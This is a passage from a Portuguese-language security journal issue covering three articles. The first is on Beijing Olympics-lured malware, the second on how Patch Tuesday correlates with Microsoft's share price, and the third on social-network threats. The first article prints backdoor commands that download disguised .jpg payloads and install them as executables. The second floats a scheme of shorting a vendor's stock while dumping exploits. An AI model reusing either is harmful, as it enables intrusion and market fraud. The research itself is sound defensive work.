@n11@http://www1.palms[removido]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d3 02f7a58aeb1@ @n11@http://www1.palms[removido]/ld/v2/200764.jpg @%SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe 94ffd48c@.
Esses comandos signicam, a grosso modo, fazer download do arquivo anteriormente mencionado com a extenso .JPG e installo na pasta %SysDir% da mquina da vtima utilizando o nome de arquivo executvel fornecido. A ltima parte da resposta o hash md5 do arquivo que ser transferido por download (e que ser utilizado para vericar a integridade do arquivo). Durante todo o processo, as vtimas cam completamente alheias ao que acontece em segundo plano. Enquanto elas lem e preenchem a declarao instalada pelo arquivo PDF malicioso, o backdoor discretamente instalado em seus computadores, esperando por comandos do atacante. A essa altura, quaisquer outros arquivos maliciosos podem ser transferidos por download para a mquina, uma vez que ela j est comprometida.
20
Concluso
Os eventos esportivos so freqentemente utilizados como isca para ataques de engenharia social. J era de se esperar que os desenvolvedores de malware voltassem suas atenes para as Olimpadas de Pequim. O evento tinha todos os ingredientes necessrios para uma receita perfeita: pequenos ataques direcionados cresciam em alcance conforme o nmero de vtimas interessadas no assunto aumentava. Esse crescimento era possvel devido s questes intimamente relacionadas a preocupao com o Tibete lembra a passagem da tocha pelo mundo, que, por sua vez, lembra as prprias Olimpadas. A mdia costuma desempenhar um papel importante no aumento da popularidade de um evento. Seus esforos levam algumas vtimas a buscar mais informaes, mas estas freqentemente esbarram em sites relacionados, porm maliciosos, ou o mais comum, em sites legtimos que esto comprometidos e que infectam discretamente visitantes incautos. Esses ataques so to elaborados que as vtimas provavelmente no suspeitam de nada. Conforme aprendemos com o estudo de caso, estamos diante de ameaas no apenas de remetentes annimos e anexos de email com extenso .exe. Documentos legtimos (Microsoft Word, Microsoft Excel, Microsoft PowerPoint e outros) tambm podem ser maliciosos. Esses ataques so to bem-sucedidos devido, em parte, crena ingnua de que arquivos de dados no podem conter malware. Em ltima instncia, as pessoas tendem a estar mais atentas aos truques mais comuns, o que, por sua vez, fora os atacantes a ser mais criativos e perversos em suas tcnicas para se manter vitoriosos sobre suas vtimas.
Elodie Grandjean trabalha como pesquisadora de vrus para o McAfee Avert Labs em Frana desde janeiro de 2005. Ela tem mais de cinco anos de experincia em engenharia reversa em plataformas Windows. Grandjean especializada em tcnicas de engenharia reversa, desempacotamento e decodicao, alm de escrever para a revista francesa de segurana MISC: Multi-System & Internet Security Cookbook. Quando no est analisando malware ou programando, Grandjean est provavelmente navegando pela Internet, a no ser que esteja em um concerto ao vivo ou saboreando uma cerveja belga em um pub com seus amigos.
Notas de rodap
1 Fribet, McAfee VIL. http://vil.nai.com/vil/content/v_144356.htm 2 Is Malware Writing the Next Olympic Event? (O malware est escrevendo o prximo evento olmpico?) Blog do McAfee Avert Labs. http://www.avertlabs.com/research/blog/index.php/2008/04/14/is-malwarewriting-the-next-olympic-event/ 3 BackDoor-DOW, McAfee VIL. http://vil.nai.com/vil/content/v_144476.htm 4 Services (Servios), Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms685141(VS.85).aspx 5 Registry (Registro), Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms724871(VS.85).aspx 6 A description of Svchost.exe in Windows XP Professional Edition (Uma descrio de Svchost.exe no Windows XP Professional Edition) Microsoft Ajuda e Suporte. http://support.microsoft.com/kb/314056/en-us 7 FakeAlert-B, McAfee VIL. http://vil.nai.com/vil/content/v_139058.htm FakeAlert-C. http://vil.nai.com/vil/content/v_139219.htm FakeAlert-D. http://vil.nai.com/vil/content/v_140346.htm FakeAlert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm FakeAlert-H. http://vil.nai.com/vil/content/v_141377.htm FakeAlert-I. http://vil.nai.com/vil/content/v_141466.htm FakeAlert-G. http://vil.nai.com/vil/content/v_141163.htm FakeAlert-M. http://vil.nai.com/vil/content/v_142807.htm FakeAlert-Q. http://vil.nai.com/vil/content/v_143088.htm FakeAlert-R. http://vil.nai.com/vil/content/v_143102.htm FakeAlert-S.dll. http://vil.nai.com/vil/content/v_143110.htm FakeAlert-T. http://vil.nai.com/vil/content/v_143406.htm Generic FakeAlert.a. http://vil.nai.com/vil/content/v_143470.htm
21
Vulnerabilidades nos mercados de aes

Por Anthony Bettini
A recente crise de crdito nos mercados de ttulos e derivativos ressaltou signicativamente muitas facetas da indstria nanceira, e no apenas estruturas de controle regulatrio, agentes de classicao de risco, fundos de hedge, private equity, fundos de penso e outros especialistas de mercado.
Com essa constante ateno da mdia, as pessoas de cincias relacionadas (como bioinformtica, cincia da computao, etc.) esto comeando a examinar mais de perto a engenharia nanceira. Com nossa base em pesquisa de vulnerabilidades e considerando o contexto da nfase dada pela mdia crise de crdito, natural que procuremos vulnerabilidades nos mercados de ttulos e derivativos. Na conferncia Black Hat de 2007 nos EUA, a Matasano Security examinou o protocolo FIX (Financial Information eXchange), no qual se baseia o trmite de mensagens entre os gerentes de investimento, que realizam vrias transaes em nome dos clientes, e os corretores e negociadores.1, 2 A pesquisa da Matasano faz perguntas como Quais vulnerabilidades podem estar presentes no protocolo FIX? Essa foi uma abordagem interessante dos protocolos nanceiros do ponto de vista de decincia da segurana. No entanto, nosso artigo tomar um rumo diferente: estamos mais preocupados com a engenharia social e nanceira do que com o aspecto da vulnerabilidade. Nossa pesquisa comea com as seguintes questes:

Como essa uma rea de estudo muito ampla, vamos comear analisando apenas vulnerabilidades em produtos da Microsoft. No futuro prximo, esperamos contar com alguns dados complementares de outros desenvolvedores de software, bem como uma comparao do ponto de vista econmico entre os vrios mtodos de distribuio de correes (por exemplo, o lanamento mensal da Microsoft, o lanamento trimestral da Oracle e os lanamentos de outros fornecedores conforme a necessidade).
A hiptese
A Patch Tuesday ocorre na segunda tera-feira de cada ms. o dia do ms em que a Microsoft lana atualizaes de funcionalidade e, principalmente, de segurana para o Windows e seus outros aplicativos. Nossa hiptese que na Patch Tuesday, h uma presso pela reduo do preo das aes da Microsoft (nome do ticker: MSFT). Essa presso , provavelmente, decorrente das reaes aos artigos de notcias sobre as implicaes negativas de vulnerabilidades de segurana no software da Microsoft. Da mesma forma, h provavelmente uma tendncia de alta no dia seguinte, quarta-feira, quando as pessoas percebem que as aes da Microsoft foram vendidas abaixo do preo no dia anterior.
Quais so as implicaes da Patch Tuesday da Microsoft sobre o preo das aes? E quanto ao dia que antecede uma Patch Tuesday? E quanto ao dia seguinte a uma Patch Tuesday, s vezes chamado de Exploit Wednesday (quarta-feira dos exploits)? E quanto quinta-feira de Noticao prvia? E quanto s ameaas zero-day? Os investidores chegam a perceber esses eventos? J existem eventos de engenharia social envolvendo vulnerabilidades e ttulos? Haver ainda mais desses eventos no futuro?
As pessoas esto ganhando dinheiro com a Patch Tuesday?

Aparentemente, sim. Parece haver, no mnimo, uma correlao entre as utuaes do preo das aes da Microsoft e o ciclo de lanamento da Patch Tuesday. Considere, por exemplo, a gura 1 (prxima pgina).
22
A primeira linha, Mdia do ano inteiro, nossa mdia de linha de base da diferena entre o preo das aes da Microsoft na abertura do prego e seu preo no fechamento do dia. Inclumos como uma linha de base alternativa a mdia dos Dias sem eventos, que exclui eventos, tais como Noticao prvia e Patch Tuesday. Aparentemente, quando a Microsoft faz uma Noticao prvia, o preo apresenta, na mdia, uma tendncia de baixa mais forte que a habitual. Da mesma forma, em uma Patch Tuesday tpica, h uma tendncia de baixa mais forte que a habitual. Ainda mais interessante que na quarta-feira dos exploits (o dia seguinte Patch Tuesday), h uma tendncia de alta ou um fechamento lquido positivo, na mdia. Isso provavelmente acontece porque investidores institucionais ou especialistas de mercado percebem que a Microsoft cou abaixo do preo de mercado no dia anterior devido s ms notcias e que, na realidade, o valor da Microsoft como investimento foi muito pouco afetado. Observe que essa tendncia tem sido consistente durante os ltimos trs anos e continua at
Variao no preo das aes da Microsoft da abertura ao fechamento do dia
VARIAO DA MSFT DA ABERTURA AO FECHAMENTO
hoje. Embora a mdia da abertura at o fechamento seja provavelmente mais fcil de entender, as tendncias tambm podem ser vistas nas mdias de abertura at a alta (preo do dia) e de abertura at a baixa, embora, em alguns casos, o efeito seja menos pronunciado. Na gura 2 vemos que a mdia de mxima intraday em um dia de Noticao prvia e em uma Patch Tuesday menor que a mdia de mxima intraday no ano. Tambm vemos que a mdia de mxima intraday em um dia seguinte a uma Patch Tuesday geralmente maior indicando presses de alta mais fortes. Na gura 3 descobrimos que a mdia de mnima intraday em uma Patch Tuesday geralmente menor que a mdia de mnima intraday no ano. No entanto, para um dia de Noticao prvia, os resultados so mais misturados. Tambm relevante que a mdia de mnima intraday em um dia seguinte a uma Patch Tuesday normalmente maior que a mdia do ano inteiro, indicando presses de alta mais fortes.
Microsoft da abertura mnima intraday
2008
2007
2006
VARIAO DA MSFT DA ABERTURA MNIMA
2008
2007
2006
Mdia do ano inteiro Dias sem eventos Notificao prvia Patch Tuesday Toda tera-feira Tera-feira que no seja Patch Tuesday Dia seguinte a Patch Tuesday Toda quarta-feira Toda quarta-feira que no seja seguinte a Patch Tuesday
-0,17% -0,20% -0,43% -0,45% 0,16% 0,37% 0,49% -0,18% -0,40%
0,06% 0,07% -0,12% -0,29% 0,05% 0,15% 0,21% 0,44% 0,51%
0,08% 0,08% -0,08% -0,11% -0,03% -0,01% 0,27% 0,29% 0,26%
-1,35% -1,39% -1,24% -1,58% -1,16% -1,01% -0,91% -1,39% -1,56%
-0,89% -0,90% -1,24% -0,99% -0,81% -0,76% -0,74% -0,78% -0,79%
-0,64% -0,64% -0,36% -0,93% -0,74% -0,68% -0,47% -0,51% -0,54%
Figura 1: Um exame da variao no preo das aes da Microsoft em dias-chave mostra uma tendncia consistente em trs anos. Microsoft da abertura mxima intraday
VARIAO DA MSFT DA ABERTURA MXIMA
Figura 3: Patch Tuesday preserva sua posio baixa quando comparada com a mdia de mnima intraday do ano.
2008
2007
2006
1,28% 1,34% 0,93% 0,92% 1,35% 1,50% 1,52% 1,25% 1,17%
0,97% 0,95% 1,08% 0,98% 1,01% 1,02% 1,30% 1,24% 1,23%
0,88% 0,88% 0,58% 0,67% 0,92% 0,99% 0,70% 0,92% 0,95%
Figura 2: Na negociao intraday, os dias de Noticao prvia e as teras-feiras com Patch Tuesday reduzem consistentemente as mdias dos preos das aes em comparao com os outros dias do ano. OUTUBRO-DEZEMBRO 2008 23
Um conselho para o investidor individual ou casual: essas utuaes de preo so relativamente pequenas e bastante efmeras. Lucrar em nvel individual com tais negociaes exigiria arriscar uma grande quantidade de capital. Um outro conselho que o conjunto de dados mostrado relativamente pequeno e, portanto, de qualidade relativamente baixa, por sua prpria natureza. Por exemplo, existem apenas 260 dias de prego por ano, dos quais apenas 12 caem em uma Patch Tuesday. Embora o conjunto de dados e as utuaes sejam pequenos, esse nvel de correlao provavelmente ir apenas interessar a investidores institucionais, devendo ser modelado de maneira apropriada. Agora vejamos alguns spreads comparativos de lucro potencial na gura 4. Na gura 4, parece que comprar perto da mdia de mnima intraday em uma Patch Tuesday e, ento, vender perto da mdia de mxima intraday no dia seguinte proporcionaria um pequeno lucro (at essa negociao se tornar mais comum, resultando no amortecimento do efeito). Os spreads de lucro mostrados acima enfatizam descobertas de vulnerabilidades reais que ocorrem com base na suposio de que as outras pessoas trabalham de uma maneira previsvel. No entanto, assim como rumores de uma oferta hostil afetam o preo de uma ao, rumores de vrios defeitos crticos colocando os consumidores em risco tambm podem ter esse efeito.
Considere que falsos rumores e divulgaes de vulnerabilidades j aparecem hoje em dia em listas de emails como a Full Disclosure ou em salas de bate-papo IRC. possvel que tais eventos possam ser orquestrados atravs de engenharia social para manipular o mercado e seus participantes. Esse cenrio seria claramente ilegal, mas onde h lucro, h freqentemente pessoas dispostas a infringir as leis. Da mesma forma, como veremos mais adiante, nem todos os ataques envolveriam engenharia social. Alguns podem at estar dentro da lei. Situaes como essas (previsibilidade de curto prazo do mercado resultando em lucros), pelo menos de acordo com a hiptese de ecincia de mercado EMH (Efcient Market Hypothesis) e com a hiptese de passeio aleatrio (Random Walk Hypothesis), so de existncia improvvel, e certamente seria improvvel que perdurassem.3, 4 Assim sendo, recomendamos cautela aos leitores, como todas as entidades nanceiras deveriam fazer, e armamos que o desempenho passado no indica necessariamente resultados futuros.5
Alavancagem do volume de aes como indicador

Uma outra teoria vlida que tivemos foi de que o ciclo Patch Tuesday teria amortecido o efeito da publicidade negativa que se constata nos dias dos lanamentos de boletins no programados (antes de meados de outubro de 2003). Um rpido exame supercial do indicador de volume de aes parece apoiar essa teoria. (Veja a gura 5 na prxima pgina.)
Spreads de lucro potencial
SPREADS
2008
2007
2006
Intraday mnima Ano inteiro (mnima intraday) a ano inteiro (mxima intraday) Patch Tuesday (mnima intraday) a Patch Tuesday (mxima intraday) Patch Tuesday (mnima intraday) ao dia seguinte a Patch Tuesday (mxima intraday) -1,35% -1,58% -1,58%
Intraday mxima 1,28% 0,92% 1,52%
Intraday mnima -0,89% -0,99% -0,99%
Intraday mnima -0,64% -0,93% -0,93%
Figura 4: Comprar aes em uma Patch Tuesday e vendlas no dia seguinte pode, aparentemente, proporcionar um lucro legtimo, mas somente ao negociar grandes quantidades e com um risco considervel.
24
Volumes da Microsoft, 2002 03

DIFERENCIAIS DE VOLUME DA MSFT (NO PROGRAMADO) 2003 2002
Volume mdio; ano inteiro (em aes negociadas por dia) Volume mdio; ano inteiro (no-evento) Volume mdio; dia de boletim no programado Diferena mdia de volume Diferena mdia de volume em relao a no-eventos
65.074.644 64.512.432 70.017.743 7,60% 8,53%
76.903.678 76.503.325 78.796.255 2,46% 3,00%
Figura 5: Volume de negociao da Microsoft antes de sua mudana de boletins no programados para a Patch Tuesday.
Lanamentos de Patch Tuesday

DIFERENCIAIS DE VOLUME DA MSFT (PROGRAMADO)
2008
2007
2006
2005
2004
Volume mdio; ano inteiro Volume mdio; ano inteiro (no-evento) Volume mdio; dia de Patch Tuesday Volume mdio de tera-feira que no seja Patch Tuesday Diferena mdia da MSFT em volume (Patch Tuesday a ano inteiro) Diferena mdia da MSFT em volume (Patch Tuesday a no-eventos) Volume mdio da ÎXIC; ano inteiro Volume mdio da ÎXIC; ano inteiro (no-eventos) Volume mdio da ÎXIC em Patch Tuesday Volume mdio da ÎXIC na tera-feira que no seja Patch Tuesday Diferena mdia de volume da ÎXIC (Patch Tuesday a ano inteiro) Diferena mdia de volume da ÎXIC (Patch Tuesday a no-eventos) Diferena entre MSFT em Patch Tuesday e MSFT em tera-feira que no seja Patch Tuesday Diferena entre ÎXIC em Patch Tuesday e ÎXIC em tera-feira que no seja Patch Tuesday
84.898.274 86.738.696 75.584.620 79.818.571 -10,97% -12,86%
62.506.437 64.210.868 57.840.233 59.305.574 -7,47% -9,92%
67.074.387 68.753.419 63.786.108 64.967.877 -4,90% -7,22%
66.612.503 67.227.483 65.453.142 69.691.473 -1,74% -2,64%
66.793.733 67.260.018 65.439.875 66.471.610 -2,03% -2,71%
2.249.267.340 2.089.534.502 1.926.859.522 1.731.835.794 1.769.480.040 2.271.900.270 2.094.466.552 1.935.854.692 1.732.949.769 1.768.463.981 2.161.318.000 2.054.922.500 2.009.946.667 1.745.967.500 1.759.816.667 2.249.947.143 2.107.280.909 1.813.831.818 1.658.301.818 1.752.408.182 -3,91% -4,87% -5,30% -3,94% -1,66% -1,89% -2,47% -2,48% 4,31% 3,83% -1,82% 10,81% 0,82% 0,75% -6,08% 5,29% -0,55% -0,49% -1,55% 0,42%
Figura 6: A instituio da Patch Tuesday aparentemente convenceu os negociadores de que no h vantagem a ser ganha unicamente com eventos Patch Tuesday.
25
Na gura 5 (pgina 25), vemos que no dia do lanamento de um boletim no programado em 2003 e 2002, o volume mdio de aes negociadas ultrapassava o volume mdio do ano em 7,6% e 2,46%, respectivamente, em mdia. Ao comparar o volume mdio apenas nos dias sem eventos do ano todo, esses valores pulam para 8,53% e 3%, respectivamente. Isso contrasta bastante com os diferenciais de volume dos lanamentos mais previsveis de Patch Tuesday, mostrados na gura 6 (pgina 25). Tambm inclumos uma comparao entre a cotao da Microsoft (MSFT) e o ndice composto NASDAQ (ÎXIC). Isso implicaria que o efeito da mudana de boletins no programados (passeio aleatrio) para pr-programados (Patch Tuesday) fez cair, entre os negociadores, o nvel de interesse por eventos associados Patch Tuesday. Em seguida, veremos os dados comparativos da Noticao prvia (veja a gura 7 abaixo). Por que o volume mdio menor nos dias de Patch Tuesday e de Noticao prvia? Nossa hiptese de que a mdia de volume do ano inteiro em comparao com a mdia de volume da Patch Tuesday pode ser explicada devido aos eventos signicativamente relevantes que afetam a mdia do ano inteiro (da teoria da probabilidade martingale), os quais so estatisticamente menos provveis em uma Patch Tuesday devido sua pouca freqncia (apenas 12 vezes por ano).6
possvel que as pessoas j estejam usando ameaas zero-day para ganhos nanceiros, e no apenas incorporando cavalos de Tria para roubo de senhas, mas para fazer venda de opes ou de aes e derivativos a termo.
Informes imprensa, reaes e implicaes

As implicaes disso so interessantes e esperamos que este artigo motive uma nova rodada de pesquisas sobre a inuncia das vulnerabilidades e ameaas sobre os mercados de aes. Por exemplo, considere a fraude Emulex.7 Nesse caso, algum postou um informe falso imprensa sobre a sada do CEO, o que resultou em uma queda de 62% na negociao intraday das aes da Emulex. A pessoa que postou o informe falso fez uma venda curta no coberta das aes e lucrou mais de US$250.000. Isso foi, claramente, um caso de fraude. Da mesma forma, h casos peridicos no noticirio sobre negociao com informao privilegiada (tambm claramente ilegal).
Noticao prvia
DIFERENCIAIS DE VOLUME DA MSFT (NOTIFICAO PRVIA)
2008
2007
2006
Volume mdio; ano inteiro Volume mdio; ano inteiro (no-evento) Volume mdio; dia de Notificao prvia Diferena mdia de volume Diferena mdia de volume em relao a no-eventos Volume mdio da ÎXIC; ano inteiro Volume mdio da ÎXIC; ano inteiro (no-evento) Volume mdio da ÎXIC em Notificao prvia
84.898.274 86.738.696 82.848.700 -2,41% -4,48%
62.506.437 64.210.868 61.532.042 -1,56% -4,17%
67.074.387 68.753.419 54.484.850 -18,77% -20,75%
2.249.267.340 2.089.534.502 1.926.859.522 2.271.900.270 2.094.466.552 1.935.854.692 2.221.380.000 2.224.365.833 1.872.442.500
Figura 7: Em mdia, menos aes da Microsoft so negociadas em dias de Patch Tuesday e Noticao prvia.
26
No entanto, se as utuaes dos preos das aes ocorrem devido a anncios de vulnerabilidade e de correes, o que aconteceria se uma pessoa zesse uma venda curta no coberta das aes de uma grande empresa de software e postasse um punhado de vulnerabilidades com exploits na lista de emails Full Disclosure? Talvez algo como o Month-of-Browser-Bugs, mas voltado para um nico fornecedor, em um nico dia? Se isso acontecesse dentro do horrio de funcionamento do mercado durante um dia com menor probabilidade de outras notcias que distrassem os investidores (digamos, uma tera-feira ou uma quinta-feira), as presses por queda da ao seriam signicativas no nvel do consumidor. Tambm seria claramente ilegal se as vulnerabilidades no fossem reais (talvez difamao ou fraude). Porm, se elas fossem reais, isso seria ilegal? Informar a verdade, ainda que de uma forma manipuladora, pode ou no ser considerado engenharia social ou at mesmo algo ilegal. Talvez a legalidade possa ser alegada de uma forma ou de outra, mas considere a controvrsia entre Ford e Firestone sobre pneus.8 Se voc tivesse dirigido um carro da Ford na ocasio, tivesse problemas com os pneus e vendesse aes a termo, isso seria legal? Certamente. Se voc tivesse vendido as aes a termos e, em seguida, informasse Firestone, Ford e aos outros, isso teria sido legal? Como em qualquer vulnerabilidade ou vetor de ataque, o conhecimento e a divulgao freqentemente melhoram a postura de segurana daqueles que podem resolver o problema. Ao falar abertamente sobre decincias, talvez possamos aprimorar e monitorizar devidamente o sistema. possvel que as pessoas j estejam usando ameaas zero-day para ganhos nanceiros, e no apenas incorporando cavalos de Tria para roubo de senhas, mas para fazer venda de opes ou de aes e derivativos a termo. Est claro que os spammers descobriram maneiras de lucrar com os mercados de aes: ns recebemos vrios tipos de spam sobre pequenos volumes de aes.
Concluso
Ainda h muito trabalho a ser feito na rea de vulnerabilidade e implicaes das ameaas aos mercados de aes e derivativos. Estamos concentrados principalmente nos mercados de aes. Os mercados de derivativos costumam se mover na mesma direo, mas com maior volatilidade. Com base em algum nvel de conana na direo de tal movimentao, provavelmente seria lgico que os negociadores publicassem as vulnerabilidades de forma sincronizada com as datas de vencimento das opes. Eu gostaria de agradecer a meus colegas Craig Schmugar e Eugene Tsyrklevich por revisar este documento e seu conjunto de dados, bem como por suas opinies. A.B.
Anthony Bettini membro snior da equipe de gerenciamento do McAfee Avert Labs. Ele especialista em deteco de vulnerabilidades e segurana do Windows. Bettini j discursou na Conferncia nacional de segurana de sistemas de informao do National Institute of Standards and Technology em Washington, D.C. sobre tcnicas anti-rastreamento, bem como para vrias empresas do Global 2000. Enquanto estava na Foundstone, ele publicou novas vulnerabilidades encontradas no Microsoft Windows, ISS Scanner, PGP, Symantec ESM e em outros aplicativos populares. Bettini foi editor tcnico da 5a edio de Hacking Exposed (Hackers expostos) (McGraw-Hill).
Notas de rodap
1 Goldsmith, Dave e Jeremy Rauch; Matasano Security. Hacking Capitalism (hackers contra o capitalismo), Black Hat USA 2007. 2 de agosto de 2007. 2 Financial Information eXchange, Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Financial_Information_eXchange 3 Random walk hypothesis (Hiptese de passeio aleatrio), Wikipedia. 15 de maio de 2008. http://en.wikipedia.org/wiki/Random_walk_hypothesis 4 Efcient Market Hypothesis (Hiptese de ecincia de mercado), Wikipedia. 15 de maio de 2008. http://en.wikipedia.org/wiki/Efcient_market_hypothesis 5 Past performance not indicative of future results (O desempenho passado no indicao de resultados futuros), CBOE. 22 de maio de 2008. http://www.cboe.com/micro/vix/faq.aspx 6 Martingale (probability theory) (teoria de probabilidade), Wikipedia. 22 de maio de 2008. http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29 7 Emulex Hoax (Fraude da Emulex), Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Emulex_hoax 8 Firestone and Ford tire controversy (Controvrsia entre Ford e Firestone sobre pneus), Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy
reFerNcias adicioNais
Arquivo de dados histricos de VIX da CBOE, utilizando um algoritmo mais novo para o perodo anterior mudana de algoritmo de 22 de setembro de 2003. 20 de abril de 2008. http://www.cboe.com/micro/vix/historical.aspx Lo, Andrew W. The Adaptive Markets Hypothesis: Market Efciency from an Evolutionary Perspective. (A hiptese de mercados adaptveis: a ecincia do mercado de um ponto de vista evolutivo) Journal of Portfolio Management. As estatsticas nanceiras so principalmente cortesia do Yahoo Finance. 15 de maio de 2008. http://nance.yahoo.com Estatsticas nanceiras adicionais so cortesia do Google Finance. 20 de abril de 2008. http://nance.google.com
27
O futuro dos sites de rede social

Por Craig Schmugar
Nos ltimos anos, sites de rede social MySpace, Facebook e outros tornaram-se palavras de uso corrente. Muitas pessoas encaram as redes sociais na Internet como um fenmeno relativamente novo
quando, na realidade, sites como Classmates.com e SixDegrees.com j esto por a h mais de uma dcada. Ainda assim, a exploso de crescimento ocorreu apenas nos ltimos anos. Ento, o que, exatamente, faz de um site um local de rede social? Essencialmente, sites de rede social so aqueles que compreendem uma comunidade on-line que permite aos usurios compartilhar informaes, descobrir novos contatos e rever velhos conhecidos. Os sites de rede social so signicativos por dois motivos. Primeiro, eles so a sntese da Web 2.0, na qual a rede de usurios a plataforma e a comunidade dirige o contedo. A plataforma cresce com as contribuies dos usurios, viabilizada por aplicativos fornecidos para uso da comunidade. Segundo, os sites de rede social combinam elementos de canais de comunicao (como email, grupos de mensagens, mensagens instantneas e bate-papo) com veculos de mdia (como udio, vdeo e matrias impressas). Nessas comunidades, pessoas com anidades podem compartilhar informaes e interesses e dar suas opinies e pontos de vista. Tais sites podem atuar como plataformas de colaborao, permitindo que redes inteiras cresam em valor conforme a base de usurios aumenta. Alm disso, essas plataformas viabilizam os canais de mdia mais diretos e dirigidos jamais vistos; as empresas podem concentrar seus esforos de marketing naquelas pessoas realmente interessadas. Os sites de rede social contm um variedade de informaes que podem ser garimpadas e analisadas para expandir os pers dos usurios, construir complexos diagramas e mapas correlacionando usurios com usurios e usurios com interesses. A chave para o sucesso de qualquer site de rede social uma base de usurios forte e el. O Friendster.com sabe isso tudo muito bem. O Friendster foi o precursor do MySpace e foi, sem dvida, o site de rede social nmero um durante sua melhor fase. O que aconteceu com ele? O Friendster foi uma espcie de catstrofe do sucesso. medida que a base de usurios crescia e o contedo evolua (incluindo o acrscimo de jogos), o back end no conseguia acompanhar o crescimento. Os administradores do site foram forados a restringir o contedo de banda larga, mas mesmo assim o desempenho continuou insatisfatrio e a base de usurios abandonou o barco. Alm disso, o Friendster tentou encaixar a base de usurios em seu modelo predeterminado de como e por quem a rede deveria ser utilizada. O MySpace ofereceu uma plataforma mais robusta, no apenas devido sua maior largura de banda, mas tambm no nvel de liberdade que os usurios tinham para criar, modicar e visualizar uma variedade mais ampla de contedo. Quando correu a notcia de que o MySpace era o novo Friendster, no demorou muito para que a maioria dos usurios migrasse. Algumas lies que podem ser aprendidas com essa antiga batalha da rede social so que a plataforma precisa ser exvel, que ela precisa se expandir e evoluir e que a delizao dos usurios fundamental. Esses princpios esto denindo o futuro dos sites de rede social.
Insegurana social
O MySpace conseguiu superar o Friendster, em parte por permitir aos usurios um alto nvel de personalizao de seus pers. No entanto, isso abriu a porta para atacantes inserirem cdigos maliciosos, bem como lanarem ataques de phishing convincentes, diretamente a partir dos pers do MySpace. Infelizmente, tal exibilidade do usurio propicia condies explorveis, as quais os malfeitores usam e abusam. Devido corrida por participao de mercado e no empenho de evitar repetir a experincia do Friendster, a segurana foi preterida em muitos sites de rede social. Conseqentemente, os sites de rede social tm abrigado worms, ataques de phishing, vulnerabilidades, coleta e vazamento de dados, distribuio de anncios ilcitos, difamao e, nalmente, spam.
28
Qual a situao agora?

Dois anos e meio aps o Samy, o primeiro worm amplamente difundido de rede social, lanado em 4 de outubro de 2005, entrar em cena, a maioria das antigas vulnerabilidades de segurana j tinha sido corrigida. No entanto, o problema no deixar de existir. At que as falhas de segurana resultem em menos assinantes, as vulnerabilidades ainda sero comuns e as vulnerabilidades de scripts entre sites, como as que foram exploradas pelo Samy, esto entre os tipos de vulnerabilidade mais amplamente mencionados no banco de dados Common Vulnerabilities and Exposures (vulnerabilidades e exposies comuns).1 A situao provavelmente vai piorar antes que melhore. Em maio de 2007, o Facebook lanou a plataforma Facebook, que permitiu a outros desenvolvedores criar e comercializar aplicativos para 20 milhes de usurios ativos do Facebook. Um ano depois e com 50 milhes de usurios a mais, mais de 20.000 aplicativos Facebook foram desenvolvidos, com 95% da base de usurios tendo executado pelo menos um aplicativo.2 Esses aplicativos representam riscos adicionais porque os usurios tm uma falsa sensao de segurana devido aos aplicativos estarem associados a um site no qual eles conam, o Facebook. com. Na verdade, a grande maioria desses aplicativos lanada pelos desenvolvedores sem exame prvio por parte do site. Em janeiro de 2008, o Facebook baniu o aplicativo Secret Crush aps se saber que este havia induzido usurios a instalar o adware Zango.3 (Veja na gura 1 outros exemplos de ameaas difundidas.) O importante que o Facebook no avalia os aplicativos e as coisas podem sair do controle (como acabou acontecendo). Embora esse caso em questo no tenha sido mais que uma inconvenincia (adware), o prximo pode ser bem pior.
Toda vez que voc clica em um link, avalia um blog ou conversa em um chat sobre um determinado assunto, o site pode levantar informaes sobre voc para aprimorar a sua rede social.
Aproximadamente nove meses aps o Facebook lanar sua plataforma, o MySpace fez a sua verso e, recentemente, o Google lanou uma interface de programas aplicativos (API Application Program Interface) para o Orkut, site de rede social do Google. Embora essas plataformas tenham preparado o terreno para a prxima gerao de sites de rede social, elas tambm criaram mais um vetor para os atacantes explorarem.
O que vem pela frente?

Os futuros sites de rede social sero mais importantes porque as plataformas sero ainda mais expandidas. Aplicativos mais avanados incluiro identicao de localizao, presena e mobilidade, com o objetivo de tornar a sua vida fsica mais conveniente atravs da sua rede virtual; voc ter no bolso uma rede social mvel. Voc no apenas poder saber quais dos seus amigos da rede esto on-line, mas tambm poder saber quais esto por perto. Sistemas de posicionamento global e de triangulao de torres de celular podero informar a sua localizao para quem voc quiser. Servios com base na sua localizao podem fazer uma correspondncia das empresas e opes de entretenimento locais com seus interesses, segundo o seu perl. Pessoas viajando a trabalho podem se encontrar mais facilmente com colaboradores e clientes em conferncias e exposies. A emoo dos encontros on-line ser ainda maior com a criao de comunidades especcas de cada local, para que voc possa se encontrar com algum on-line, mas tambm conversar com um potencial pretendente na mesma sala. Os sites sociais tambm sero mais inteligentes, garimpando informaes do usurio atravs da Web. A funcionalidade de site de links favoritos, como no Digg, ser conjugada a redes sociais e aprimorada com tecnologia de auto-aprendizagem, como no Pandora ou no StumbleUpon, e com funcionalidade de marcaes, como no Flickr. O resultado um uxo mais constante e renado de informaes relevantes, o que, na verdade, educa e informa a comunidade de uma maneira muito mais eciente do que a que ocorre atualmente. A partir do seu iPhone, voc poder obter recomendaes de lmes das pessoas da sua rede. Voc tambm poder ler notcias que os seus amigos acharam teis e descobrir horrios de apresentaes nos teatros da sua vizinhana e, ento, poder vericar a localizao dos seus amigos para determinar o quo rapidamente eles podem encontrar com voc.
Ameaas de rede social classicadas
AMEAA
TIPO
SITE
Grey Goo JS/QSpace JS/SpaceFlash JS/SpaceTalk Kut Wormer Vazamento em massa de fotos privadas PWS-Banker! 1d23 Samy Scrapkut Secret Crush Xanga Worm
worm worm worm roubo de informaes worm perda de dados roubo de senhas worm worm programa indesejado worm
Second Life MySpace MySpace MySpace orkut MySpace orkut MySpace orkut FaceBook Xanga
Figura 1: Worms e outras ameaas que infestam sites de rede social. Os usurios costumam conar demais nos sites de suas comunidades.
29
